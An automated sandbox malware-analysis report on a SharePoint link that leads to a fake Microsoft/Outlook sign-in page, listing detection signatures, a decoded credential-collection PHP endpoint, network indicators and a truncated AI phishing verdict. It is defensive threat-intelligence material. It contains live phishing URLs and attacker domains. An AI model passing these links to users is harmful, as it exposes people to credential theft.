Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://atlantarecyclingsolutions-my.sharepoint.com/:f:/p/jharben/ElAbTrEoKHZNu0q9LvscywQBU6aWBJJyxxBNvrbWT_MWVA?e=mb4XFV

Overview

General Information

Sample URL:https://atlantarecyclingsolutions-my.sharepoint.com/:f:/p/jharben/ElAbTrEoKHZNu0q9LvscywQBU6aWBJJyxxBNvrbWT_MWVA?e=mb4XFV
Analysis ID:1510952

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
HTML page contains hidden URLs
Phishing site detected (based on favicon image match)
Phishing site detected (based on image similarity)
Drops files with a non-matching file extension (content does not match file extension)
HTML body contains low number of good links
HTML body contains password input but no form action
HTML body with high number of embedded images detected
HTML page contains hidden javascript code
HTML title does not match URL
Invalid 'forgot password' link found
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6328 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://atlantarecyclingsolutions-my.sharepoint.com/:f:/p/jharben/ElAbTrEoKHZNu0q9LvscywQBU6aWBJJyxxBNvrbWT_MWVA?e=mb4XFV MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6960 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 --field-trial-handle=1976,i,10745453727347013529,2598988709533328164,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: https://pub-ae58b1db74294262a3845142a7ac908a.r2.dev/0nedrivedocsx.htmlLLM: Score: 8 Reasons: The domain 'pub-ae58b1db74294262a3845142a7ac908a.r2.dev' does not match the legitimate domain associated with Microsoft, which is'microsoft.com'. The presence of a 'dev' top-level domain suggests a development or testing environment, but it does not guarantee legitimacy. The sign-in form and Microsoft logo are common features, but they can be easily replicated by a phishing site. The lack of a clear association between the brand and the domain raises suspicions. DOM: 82.5.pages.csv
Source: https://pub-ae58b1db74294262a3845142a7ac908a.r2.dev/0nedrivedocsx.htmlHTTP Parser: https://atlantarecyclingsolutions.top/wayy/a076a43.php
Source: https://pub-ae58b1db74294262a3845142a7ac908a.r2.dev/0nedrivedocsx.htmlMatcher: Template: microsoft matched with high similarity
Source: https://pub-ae58b1db74294262a3845142a7ac908a.r2.dev/0nedrivedocsx.htmlMatcher: Found strong image similarity, brand: MICROSOFT
Source: https://pub-ae58b1db74294262a3845142a7ac908a.r2.dev/0nedrivedocsx.htmlHTTP Parser: Number of links: 0
Source: https://pub-ae58b1db74294262a3845142a7ac908a.r2.dev/0nedrivedocsx.htmlHTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://pub-ae58b1db74294262a3845142a7ac908a.r2.dev/0nedrivedocsx.htmlHTTP Parser: Total embedded image size: 31111
Source: https://pub-ae58b1db74294262a3845142a7ac908a.r2.dev/0nedrivedocsx.htmlHTTP Parser: Base64 decoded: https://atlantarecyclingsolutions.top/wayy/a076a43.php
Source: https://pub-ae58b1db74294262a3845142a7ac908a.r2.dev/0nedrivedocsx.htmlHTTP Parser: Title: Sign in to Outlook does not match URL
Source: https://pub-ae58b1db74294262a3845142a7ac908a.r2.dev/0nedrivedocsx.htmlHTTP Parser: Invalid link: Forgot my password
Source: https://pub-ae58b1db74294262a3845142a7ac908a.r2.dev/0nedrivedocsx.htmlHTTP Parser: <input type="password" .../> found
Source: https://pub-ae58b1db74294262a3845142a7ac908a.r2.dev/0nedrivedocsx.htmlHTTP Parser: No favicon
Source: https://pub-ae58b1db74294262a3845142a7ac908a.r2.dev/0nedrivedocsx.htmlHTTP Parser: No <meta name="author".. found
Source: https://pub-ae58b1db74294262a3845142a7ac908a.r2.dev/0nedrivedocsx.htmlHTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.16:49755 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.16:49896 version: TLS 1.2
Source: chrome.exeMemory has grown: Private usage: 9MB later: 30MB
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: atlantarecyclingsolutions-my.sharepoint.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: m365cdn.nel.measure.office.net
Source: global trafficDNS traffic detected: DNS query: r4.res.office365.com
Source: global trafficDNS traffic detected: DNS query: config.fp.measure.office.com
Source: global trafficDNS traffic detected: DNS query: 1e137413f57f9de0c928b25b485f62f6.fp.measure.office.com
Source: global trafficDNS traffic detected: DNS query: tr-ofc-atm.office.com
Source: global trafficDNS traffic detected: DNS query: tr-ooc-acdc.office.com
Source: global trafficDNS traffic detected: DNS query: upload.fp.measure.office.com
Source: global trafficDNS traffic detected: DNS query: spo.nel.measure.office.net
Source: global trafficDNS traffic detected: DNS query: pub-ae58b1db74294262a3845142a7ac908a.r2.dev
Source: global trafficDNS traffic detected: DNS query: atlantarecyclingsolutions.top
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.16:49755 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.16:49896 version: TLS 1.2
Source: classification engineClassification label: mal60.phis.win@15/122@54/271
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://atlantarecyclingsolutions-my.sharepoint.com/:f:/p/jharben/ElAbTrEoKHZNu0q9LvscywQBU6aWBJJyxxBNvrbWT_MWVA?e=mb4XFV
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 --field-trial-handle=1976,i,10745453727347013529,2598988709533328164,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 --field-trial-handle=1976,i,10745453727347013529,2598988709533328164,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: Chrome Cache Entry: 349Jump to dropped file
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Registry Run Keys / Startup Folder
1
Process Injection
11
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
Extra Window Memory Injection
1
Extra Window Memory Injection
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://atlantarecyclingsolutions-my.sharepoint.com/:f:/p/jharben/ElAbTrEoKHZNu0q9LvscywQBU6aWBJJyxxBNvrbWT_MWVA?e=mb4XFV0%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
dual-spo-0005.spo-msedge.net
13.107.136.10
truefalse
    unknown
    code.jquery.com
    151.101.130.137
    truefalse
      unknown
      cdnjs.cloudflare.com
      104.17.25.14
      truefalse
        unknown
        www.google.com
        142.250.185.196
        truefalse
          unknown
          HHN-efz.ms-acdc.office.com
          40.99.149.210
          truefalse
            unknown
            atlantarecyclingsolutions.top
            161.35.123.82
            truetrue
              unknown
              pub-ae58b1db74294262a3845142a7ac908a.r2.dev
              104.18.3.35
              truetrue
                unknown
                s-part-0032.t-0009.t-msedge.net
                13.107.246.60
                truefalse
                  unknown
                  r4.res.office365.com
                  unknown
                  unknownfalse
                    unknown
                    tr-ofc-atm.office.com
                    unknown
                    unknownfalse
                      unknown
                      m365cdn.nel.measure.office.net
                      unknown
                      unknownfalse
                        unknown
                        spo.nel.measure.office.net
                        unknown
                        unknownfalse
                          unknown
                          1e137413f57f9de0c928b25b485f62f6.fp.measure.office.com
                          unknown
                          unknownfalse
                            unknown
                            atlantarecyclingsolutions-my.sharepoint.com
                            unknown
                            unknownfalse
                              unknown
                              upload.fp.measure.office.com
                              unknown
                              unknownfalse
                                unknown
                                config.fp.measure.office.com
                                unknown
                                unknownfalse
                                  unknown
                                  tr-ooc-acdc.office.com
                                  unknown
                                  unknownfalse
                                    unknown
                                    NameMaliciousAntivirus DetectionReputation
                                    https://pub-ae58b1db74294262a3845142a7ac908a.r2.dev/0nedrivedocsx.htmltrue
                                      unknown
                                      https://atlantarecyclingsolutions-my.sharepoint.com/personal/jharben_atlantarecyclingsolutions_com/_layouts/15/onedrive.aspx?id=%2Fpersonal%2Fjharben%5Fatlantarecyclingsolutions%5Fcom%2FDocuments%2FTXRE%20Properties&ga=1false
                                        unknown
                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs
                                        IPDomainCountryFlagASNASN NameMalicious
                                        142.250.185.206
                                        unknownUnited States
                                        15169GOOGLEUSfalse
                                        13.107.136.10
                                        dual-spo-0005.spo-msedge.netUnited States
                                        8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                        104.18.3.35
                                        pub-ae58b1db74294262a3845142a7ac908a.r2.devUnited States
                                        13335CLOUDFLARENETUStrue
                                        20.42.65.84
                                        unknownUnited States
                                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                        13.107.246.60
                                        s-part-0032.t-0009.t-msedge.netUnited States
                                        8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                        151.101.130.137
                                        code.jquery.comUnited States
                                        54113FASTLYUSfalse
                                        20.189.173.17
                                        unknownUnited States
                                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                        104.208.16.91
                                        unknownUnited States
                                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                        23.57.23.230
                                        unknownUnited States
                                        16625AKAMAI-ASUSfalse
                                        142.250.185.142
                                        unknownUnited States
                                        15169GOOGLEUSfalse
                                        52.168.112.67
                                        unknownUnited States
                                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                        161.35.123.82
                                        atlantarecyclingsolutions.topUnited States
                                        14061DIGITALOCEAN-ASNUStrue
                                        52.96.93.242
                                        unknownUnited States
                                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                        2.16.241.83
                                        unknownEuropean Union
                                        20940AKAMAI-ASN1EUfalse
                                        2.16.241.80
                                        unknownEuropean Union
                                        20940AKAMAI-ASN1EUfalse
                                        23.38.98.76
                                        unknownUnited States
                                        16625AKAMAI-ASUSfalse
                                        104.208.16.95
                                        unknownUnited States
                                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                        142.250.184.196
                                        unknownUnited States
                                        15169GOOGLEUSfalse
                                        1.1.1.1
                                        unknownAustralia
                                        13335CLOUDFLARENETUSfalse
                                        40.99.172.146
                                        unknownUnited States
                                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                        2.16.241.17
                                        unknownEuropean Union
                                        20940AKAMAI-ASN1EUfalse
                                        40.99.149.210
                                        HHN-efz.ms-acdc.office.comUnited States
                                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                        52.108.80.18
                                        unknownUnited States
                                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                        2.16.241.15
                                        unknownEuropean Union
                                        20940AKAMAI-ASN1EUfalse
                                        20.50.73.11
                                        unknownUnited States
                                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                        13.107.6.163
                                        unknownUnited States
                                        8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                        142.250.185.170
                                        unknownUnited States
                                        15169GOOGLEUSfalse
                                        142.250.181.227
                                        unknownUnited States
                                        15169GOOGLEUSfalse
                                        64.233.167.84
                                        unknownUnited States
                                        15169GOOGLEUSfalse
                                        20.189.173.25
                                        unknownUnited States
                                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                        51.116.253.170
                                        unknownUnited Kingdom
                                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                        239.255.255.250
                                        unknownReserved
                                        unknownunknownfalse
                                        142.250.185.196
                                        www.google.comUnited States
                                        15169GOOGLEUSfalse
                                        2.16.185.204
                                        unknownEuropean Union
                                        16625AKAMAI-ASUSfalse
                                        23.38.98.67
                                        unknownUnited States
                                        16625AKAMAI-ASUSfalse
                                        52.98.152.242
                                        unknownUnited States
                                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                        216.58.212.163
                                        unknownUnited States
                                        15169GOOGLEUSfalse
                                        23.38.98.86
                                        unknownUnited States
                                        16625AKAMAI-ASUSfalse
                                        104.17.25.14
                                        cdnjs.cloudflare.comUnited States
                                        13335CLOUDFLARENETUSfalse
                                        23.38.98.87
                                        unknownUnited States
                                        16625AKAMAI-ASUSfalse
                                        IP
                                        192.168.2.16
                                        192.168.2.4
                                        Joe Sandbox version:40.0.0 Tourmaline
                                        Analysis ID:1510952
                                        Start date and time:2024-09-13 18:26:32 +02:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                        Sample URL:https://atlantarecyclingsolutions-my.sharepoint.com/:f:/p/jharben/ElAbTrEoKHZNu0q9LvscywQBU6aWBJJyxxBNvrbWT_MWVA?e=mb4XFV
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:12
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • EGA enabled
                                        Analysis Mode:stream
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal60.phis.win@15/122@54/271
                                        • Exclude process from analysis (whitelisted): svchost.exe
                                        • Excluded IPs from analysis (whitelisted): 216.58.212.163, 64.233.167.84, 142.250.185.142, 34.104.35.123, 23.57.23.230, 23.38.98.67, 23.38.98.76, 23.38.98.108, 23.38.98.75, 23.38.98.102, 23.38.98.87, 23.38.98.69, 23.38.98.116, 2.16.185.204, 184.28.90.27
                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, e40491.dscd.akamaiedge.net, clientservices.googleapis.com, res-1.cdn.office.net, e19254.dscg.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, shell.cdn.office.net-c.edgekey.net.globalredir.akadns.net, shell.cdn.office.net-c.edgekey.net, clients2.google.com, edgedl.me.gvt1.com, e16604.g.akamaiedge.net, 201163-ipv4v6w.farm.dprodmgd108.sharepointonline.com.akadns.net, shell.cdn.office.net, clients.l.google.com, res-1.cdn.office.net-c.edgekey.net, prod.fs.microsoft.com.akadns.net, res-1.cdn.office.net-c.edgekey.net.globalredir.akadns.net
                                        • Not all processes where analyzed, report is missing behavior information
                                        • VT rate limit hit for: https://atlantarecyclingsolutions-my.sharepoint.com/:f:/p/jharben/ElAbTrEoKHZNu0q9LvscywQBU6aWBJJyxxBNvrbWT_MWVA?e=mb4XFV
                                        InputOutput
                                        URL: https://pub-ae58b1db74294262a3845142a7ac908a.r2.dev/0nedrivedocsx.html Model: jbxai
                                        {
                                        "brand":["Microsoft"],
                                        "contains_trigger_text":true,
                                        "prominent_button_name":"Next",
                                        "text_input_field_labels":["Email,
                                         phone,
                                         or Skype",
                                        "Can't access your account?"],
                                        "pdf_icon_visible":false,
                                        "has_visible_captcha":false,
                                        "has_urgent_text":false,
                                        "has_visible_qrcode":false}
                                        URL: https://pub-ae58b1db74294262a3845142a7ac908a.r2.dev/0nedrivedocsx.html Model: jbxai
                                        {
                                        "phishing_score":8,
                                        "brands":["Microsoft"],
                                        "brand_matches_associated_domain":false,
                                        "reasons":"The domain 'pub-ae58b1db74294262a3845142a7ac908a.r2.dev' does not match the legitimate domain associated with Microsoft,
